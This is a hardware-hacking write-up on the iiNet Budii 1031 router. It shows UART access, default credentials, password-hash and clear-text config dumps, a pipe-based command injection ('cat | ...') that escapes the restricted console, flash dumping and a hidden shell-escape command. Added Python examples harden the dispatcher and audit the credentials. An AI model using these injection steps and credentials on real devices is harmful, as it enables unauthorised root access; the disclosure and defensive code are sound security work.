iiNet Budii(1031) (UART based privesc attacks)
Opening the case we find an internal USB port; we can also see an Altera MAX JTAG breakout, a large set of GPIO pins and a UART breakout.
Connecting to the UART and booting, we can see the modem is running a Broadcom firmware:
[bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
**
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
**
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]
The user names available to us are:
(user:admin/password:admin)
(user:user/password:user)
Upon logging in we are dropped into consoled; the commands available to admin are:
[?.samp]
help logout exit quit reboot adsl
xdslctl xtm brctl cat loglevel logdest
virtualserver ddns df dumpcfg dumpmdm meminfo
psp kill dnsproxy syslog echo ifconfig ping
ps pwd sntp sysinfo tftp voice
wlctl wifidefault arp defaultgateway dhcpserver dns
endbg dac3120_dbg cpld_led lan lanhosts passwd ppp
restoredefault route save swversion cfgupdate swupdate
exitOnIdle wan 7sl factoryrestore factorywifi sysreport
audiotest usbinfo zigbeetest stopzigbee initzigbee
[/?.samp]
The user account is slightly less privileged than admin.
A quick cat of /etc/passwd or /var/passwd gives us:
[passwd]
admin:WjGFd46JWxdxE:0:0:Administrator:/:/bin/sh
support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh
iiNetBoB:75xVKjjtU6y5A:0:0:Administrator:/:/bin/sh
[/passwd]
The passwords are all UN=PW except for iiNetBoB (password unknown).
OK, so Bob's password is supposed to be very long and I don't have it, so I need more access to see the file system.
We use a pipe (|) after cat or ping; really anything will work at this point, cat is just cleaner.
So we use:
>cat | ls -al
Because the second command is not bound to consoled we can use the whole
BusyBox sh/ash command set, but after the command finishes we are returned to consoled.
By inserting a USB stick into the internal port we can simply cp out the files we need:
>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)
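The root cause of the cat trick is that consoled hands the whole input line to a shell, so anything after a pipe runs as a second program. As an added illustration (not code from the post or from the Broadcom/iiNet firmware), here is that dispatch pattern next to a hardened one that tokenises the line, allow-lists the verb against the command table shown above and never lets a shell parse the input; the command set is a subset I picked from the listing.

```python
import shlex

# Subset of the consoled command table from the '?' listing above (assumption: allow-list)
CONSOLE_COMMANDS = {"cat", "ping", "ps", "df", "ifconfig", "sysinfo", "swversion"}
# Characters that let a line reach a second program once it is handed to /bin/sh
SHELL_META = set("|;&$`<>(){}\\\n")


def dispatch_via_shell(line):
    """Vulnerable pattern: the full line goes to a shell, so 'cat | ls -al' also runs ls."""
    return ["/bin/sh", "-c", line]


def dispatch_strict(line):
    """Hardened pattern: refuse metacharacters, tokenise, allow-list the verb, no shell.

    Returns the argv that would be passed straight to execvp(); the shell never sees it.
    """
    if any(ch in SHELL_META for ch in line):
        raise ValueError("shell metacharacter in console input")
    argv = shlex.split(line)          # raises ValueError on unbalanced quotes too
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in CONSOLE_COMMANDS:
        raise ValueError(f"unknown command {argv[0]!r}")
    return argv


def is_injection(line):
    """True when the shell-based dispatch would run something the strict dispatch refuses."""
    try:
        dispatch_strict(line)
        return False
    except ValueError:
        return True
```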
Looking into the consoled routines and their links to the library libcms_cli
we find a table of hidden commands (cliHiddenCmdTable),
one of them more interesting than the others:
# DATA XREF: .data:cliHiddenCmdTable o
>iinet@sh
This command breaks out of consoled without killing the supervisors (smd & ssk).
We can always use the cat trick to break into sh, but it sometimes fouls smd control.
The command can be used from both the user account and the admin account, so in theory, if the router's admin account were locked, we could use the user account and the privesc commands to gain high-level access.
We are still very limited as to how far we can swing inside the commands, as smd and ssk respond to a lot of the actions placed across userland (telnet & ssh).
The config files can be dumped via >dumpmdm or dumpconfig,
which will also dump the users and passwords with no encoding or hashing:
<SoftwareVersion>Budii1031</SoftwareVersion>
<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>
<X_BROADCOM_COM_LoginCfg>
<AdminUserName>admin</AdminUserName>
<AdminPassword>admin</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<logintimeout>10</logintimeout>
</X_BROADCOM_COM_LoginCfg>
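The two dumps above show the three weaknesses an auditor would want to flag on this box: every account in passwd has UID 0, the MDM stores each password in clear with the hash field set to (null), and every password equals its user name. As an added example (my code, not from the post or the firmware), this script parses both dumps, using the lines quoted above as constructed sample input, and returns the findings.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the passwd lines quoted in the post
PASSWD_SAMPLE = """\
admin:WjGFd46JWxdxE:0:0:Administrator:/:/bin/sh
support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh
iiNetBoB:75xVKjjtU6y5A:0:0:Administrator:/:/bin/sh
"""

# Constructed sample: the X_BROADCOM_COM_LoginCfg block from the dumpmdm output
MDM_SAMPLE = """<X_BROADCOM_COM_LoginCfg>
<AdminUserName>admin</AdminUserName>
<AdminPassword>admin</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<logintimeout>10</logintimeout>
</X_BROADCOM_COM_LoginCfg>"""


def audit_passwd(text):
    """Flag every non-root account that has UID 0 and a real login shell."""
    findings = []
    for line in text.splitlines():
        name, _hash, uid, _gid, _gecos, _home, shell = line.split(":")
        if uid == "0" and name != "root" and shell not in ("/bin/false", "/sbin/nologin"):
            findings.append(f"{name}: UID 0 with shell {shell}")
    return findings


def audit_login_cfg(xml_text):
    """Flag clear-text storage (hash field empty or '(null)') and password == user name."""
    root = ET.fromstring(xml_text)
    findings = []
    for role in ("Admin", "Support", "User"):
        user = root.findtext(f"{role}UserName")
        password = root.findtext(f"{role}Password")
        pw_hash = root.findtext(f"{role}PasswordHash")
        if password and pw_hash in (None, "", "(null)"):
            findings.append(f"{role}: password stored in clear text, hash field is {pw_hash!r}")
        if user and password and password.lower() == user.lower():
            findings.append(f"{role}: password equals user name ({user})")
    return findings
```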
Till Next Time.